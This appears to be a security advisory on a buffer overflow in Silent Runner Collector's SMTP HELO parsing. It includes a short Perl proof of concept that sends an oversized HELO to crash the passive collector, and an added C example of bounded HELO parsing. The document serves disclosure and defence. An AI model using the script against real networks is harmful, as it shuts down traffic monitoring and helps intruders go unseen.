COMMAND

    Silent Runner Collector

SYSTEMS AFFECTED

    Silent Runner Collector

PROBLEM

    Jack Hayes found the following.  Silent Runner Collector (SRC) has a
    buffer overflow condition in the routines that parse SMTP traffic.
    SRC is the "sniffer" component of the Silent Runner network traffic
    analysis suite.  The overflow was noticed in SRC v1.6.1 but is likely
    present in other versions as well.  The buffer in question holds the
    SMTP HELO line.  The overflow occurs when a HELO command in excess of
    4096 bytes transits a network segment that the collector is
    monitoring.  This vulnerability can be exploited by an intruder to
    crash the collector and thus stop the monitoring of transiting
    network traffic.  It is not known whether this bug can be exploited
    in such a way as to allow for the execution of code on the sensor.

    #!/usr/bin/perl
    # This is a simple script that demonstrates the
    # SRC HELO overflow vulnerability.  It will result
    # in a crashed silent runner collector so please do
    # not use it on production networks.  It is intended
    # for demonstration purposes only.

    use strict;
    use warnings;
    use IO::Socket;

    # Any SMTP peer on a segment the collector monitors will do:
    # it is the passive collector, not the SMTP server, that overflows.
    my $remote_host = '192.168.111.3';
    my $remote_port = 25;

    my $buf = 'A' x 4092;

    my $socket = IO::Socket::INET->new(PeerAddr => $remote_host,
                                       PeerPort => $remote_port,
                                       Proto    => "tcp",
                                       Type     => SOCK_STREAM)
        or die "Can't connect to $remote_host:$remote_port : $@\n";

    # 'HELO ' + $buf  = 4097 bytes ( 1 byte too much)
    print $socket "HELO $buf";

    exit;
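    The following C parser is an added example, not SRC's code (the
    advisory shows nothing of SRC's internals).  It takes a sniffed TCP
    payload and bounds the HELO line the way a collector's SMTP parser
    should, so that a line over the 4096-byte limit is classified and
    reported instead of being copied into a fixed buffer.  The limit, the
    function names and the constructed inputs are assumptions; the CRLF
    line terminator and the HELO/EHLO verbs come from SMTP itself.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>   /* strncasecmp (POSIX) */
#include <stddef.h>

/* Longest SMTP command line this parser is prepared to hold. The advisory
 * reports a 4096-byte HELO buffer in SRC; the value here is only the limit
 * this example enforces, not a claim about SRC's internal layout. */
#define HELO_LINE_MAX 4096

enum helo_status {
    HELO_OK = 0,         /* HELO/EHLO line fit and was copied to out */
    HELO_NOT_HELO,       /* payload does not start with HELO or EHLO */
    HELO_NO_TERMINATOR,  /* no CRLF yet; line may continue in a later segment */
    HELO_TOO_LONG        /* line exceeds HELO_LINE_MAX: report it, copy nothing */
};

static int is_helo_verb(const unsigned char *p, size_t n)
{
    return n >= 5 && (strncasecmp((const char *)p, "HELO ", 5) == 0 ||
                      strncasecmp((const char *)p, "EHLO ", 5) == 0);
}

/* Copy the HELO/EHLO line (without CRLF) from a captured TCP payload into
 * out[outsz]. payload is raw sniffed data: not NUL-terminated, possibly a
 * partial line, possibly hostile. Every read is bounded by len and every
 * write by outsz; an oversized line is classified rather than copied, which
 * is exactly the check an unbounded copy into a fixed buffer lacks. */
enum helo_status extract_helo_line(const unsigned char *payload, size_t len,
                                   char *out, size_t outsz, size_t *line_len)
{
    if (!is_helo_verb(payload, len))
        return HELO_NOT_HELO;

    /* Look for CRLF, but stop scanning once the line is already too long. */
    size_t limit = len < HELO_LINE_MAX + 2 ? len : HELO_LINE_MAX + 2;
    size_t i;
    int found = 0;
    for (i = 0; i + 1 < limit; i++) {
        if (payload[i] == '\r' && payload[i + 1] == '\n') {
            found = 1;
            break;
        }
    }
    if (!found) {
        if (line_len) *line_len = len;
        /* Either more data is needed, or no buffer of ours could hold it. */
        return len > HELO_LINE_MAX ? HELO_TOO_LONG : HELO_NO_TERMINATOR;
    }
    if (line_len) *line_len = i;            /* bytes before the CR */
    if (i > HELO_LINE_MAX || i >= outsz)    /* i bytes plus a NUL must fit */
        return HELO_TOO_LONG;
    memcpy(out, payload, i);
    out[i] = '\0';
    return HELO_OK;
}

const char *helo_status_name(enum helo_status s)
{
    switch (s) {
    case HELO_OK:            return "ok";
    case HELO_NOT_HELO:      return "not-helo";
    case HELO_NO_TERMINATOR: return "no-terminator";
    case HELO_TOO_LONG:      return "too-long";
    }
    return "?";
}

/* Constructed input: "HELO " followed by n_as 'A' bytes, optionally CRLF
 * terminated. n_as = 4092 without CRLF has the same byte count (4097) as the
 * payload the demonstration script above sends. */
enum helo_status classify_synthetic_helo(size_t n_as, int with_crlf)
{
    static unsigned char payload[8192 + 8];
    static char line[HELO_LINE_MAX + 1];
    if (n_as > sizeof payload - 8)
        n_as = sizeof payload - 8;
    memcpy(payload, "HELO ", 5);
    memset(payload + 5, 'A', n_as);
    size_t len = 5 + n_as;
    if (with_crlf) {
        payload[len++] = '\r';
        payload[len++] = '\n';
    }
    return extract_helo_line(payload, len, line, sizeof line, NULL);
}

/* Convenience wrapper for NUL-terminated constructed sample lines. */
enum helo_status classify_cstring(const char *s)
{
    static char line[HELO_LINE_MAX + 1];
    return extract_helo_line((const unsigned char *)s, strlen(s),
                             line, sizeof line, NULL);
}

int main(void)
{
    printf("4097 bytes, no CRLF (script's payload): %s\n",
           helo_status_name(classify_synthetic_helo(4092, 0)));
    printf("4096-byte line + CRLF: %s\n",
           helo_status_name(classify_synthetic_helo(4091, 1)));
    printf("4097-byte line + CRLF: %s\n",
           helo_status_name(classify_synthetic_helo(4092, 1)));
    printf("ordinary HELO: %s\n",
           helo_status_name(classify_cstring("HELO relay.example.test\r\n")));
    return 0;
}
```

    A collector built this way logs "too-long" for the 4097-byte line and
    keeps running; the same line with one fewer 'A' and a CRLF fits.  The
    unterminated case matters for a passive sniffer because one SMTP
    command can span TCP segments, so "no-terminator" means wait for more
    data rather than fail.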

SOLUTION

    Nothing yet.